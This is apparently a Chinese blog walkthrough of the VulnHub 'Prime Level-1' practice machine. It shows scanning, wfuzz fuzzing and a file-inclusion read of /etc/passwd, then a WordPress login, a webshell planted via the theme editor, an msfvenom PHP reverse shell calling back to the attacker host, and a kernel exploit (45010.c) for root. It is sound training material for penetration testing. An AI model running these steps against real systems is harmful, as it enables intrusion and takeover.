Prime_series_Level-1
#vulnhub#渗透测试 2023-03-19

攻击机:Kali 靶机:Ubuntu
IP: 192.168.119.153 IP:

扫描局域网c段主机

方法一: nmap -sV -T4 -O 192.168.119.0/24
方法二: netdiscover -i eth0 -r 192.168.119.1/24
1.扫描到是1,2 ,245这种基本不是要找的靶机
下面这个.152很适合 开启了 22,80端口
image.png
方法三:arp-scan -l
image.png

扫描端口获得运行服务

nmap -p 1-65535 -A 192.168.119.152
image.png
可以看出开启了22端口和80端口
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: HacknPentest
|_http-server-header: Apache/2.4.18 (Ubuntu)
这里22端口只能ssh 这个应该行不通 ,所以尝试80端口
浏览器打开192.168.119.152
image.png
image.png
这里它什么也没有就只有一张kali图片 ….额这

扫描目录获得关键信息

1.dirb http://192.168.119.152
2.御剑
3.AWVS
image.png
我们查看一下第一个目录/dev
给了我一段话 ,说我正处于0阶段,多多少少有点嘲讽的意思了啊
image.png
下面还有一个index.php 但是打开还是一个 图片 。
再使用dirb工具加上参数过滤一下
dirb http://192.168.119.152 -X .txt,.php,zip
image.png
可以发现找到三个文件,前面两个都看过了 没有啥 还有一个.txt文件,查看一下
image.png
他这个是告诉我们使用fuzz工具进去webphp过滤查找不一样
FUZZ

FUZZ模糊测试

使用FUZZ代替目录,fuzz字典替换
FUZZ 找到正确的参数
目录扫描
XSS SQL注入
压力测试
密码爆破
——————————————————————————————————————————
接着上面提示 到当我们找到 location.txt 文件 我我们就可以下一步了
//see the location.txt and you will get your next move//
wfuzz 的字典
/usr/share/wfuzz/wordlist/general/common.txt
image.png
使用wfuzz 工具进行测试
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.119.152/index.php?FUZZ
image.png
扫到951个目录 所以我们要进行过滤
image.png
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt –hw 12 http://192.168.119.152/index.php?FUZZ
把是12 的屏蔽掉
image.png

文件包含

找到一个 file 目录
000000341: 200 7 L 19 W 206 Ch “file”
这个一个最常见的文件包含
访问一下这个file
http://192.168.119.152/?file=
他说我挖错文件了 ,额..
image.png
我们尝试一下前面找到两个php文件 index,php和 image.php
加上试一下,结果还是一样的
想一想 还有什么地方 没记到
前面说找到 location.txt 就可以下一步了 再试一下
噢 有东西
image.png
use ‘secrettier360’ parameter on some other php page for more fun.
说使用secrettier360 可以获得更多参数
访问一下
http://192.168.119.152/image.php?secrettier360=
image.png
得到了正确的参数 额。。。
那我们测试一下访问一下文件
我们访问一下 /etc/passwd文件 就可以找到用户这些信息了

文件包含漏洞

image.png
看不清太乱了 使用 curl 有换行
image.png
这里一一句话
image.png
让看一下 password.txt 文件
image.png
这是一个密码 ???? 但是没有用户啊
再扫一边目录 看一下 一什么
一一个wordpress 博客 系统 我们去试一下
image.png

wordpress 漏洞

image.png
找到一个博客系统
使用弱口令试一下
不行 hh

wpcan

使用wscan 工具进行 扫描
wpscan –url http://192.168.119.152/wordpress/ –enumerate u
image.png

扫描到了 一个 voctor 用户
测试刚才的密码是不是这个博客用户的密码

image.png
不出所料 登上去了
我们找一下看哪里可以上传一下webshell

文件上传

找一下文件上传点
找到一个主题编辑区
image.png
找一个可以写入的主题编辑区 secret.php
image.png
现在就可以写一句话木马 啥的啦
这里不是使用一句话 使用msf生成反弹shell

msfvenom 生成反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.119.153 lport=7777 -o shell.php
image.png

上传上去
image.png
启用监听
msf
image.png
反弹shell 成功
image.png

内核漏洞提权

msf查找漏洞提权利用脚本
searchsploit 16.04 ubuntu
image.png
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
把这个45010.c 文件进行编译
cp /usr/share/exploitdb/exploits/linux/local/45010.c ./
gcc 45010.c -o 45010
把45010 穿个 靶机的/tmp 目录下
/tmp目录每个用户都有读写权限
image.png
image.png
上传成功
cd /tmp
chmod +x 45010
./45010
cat root.txt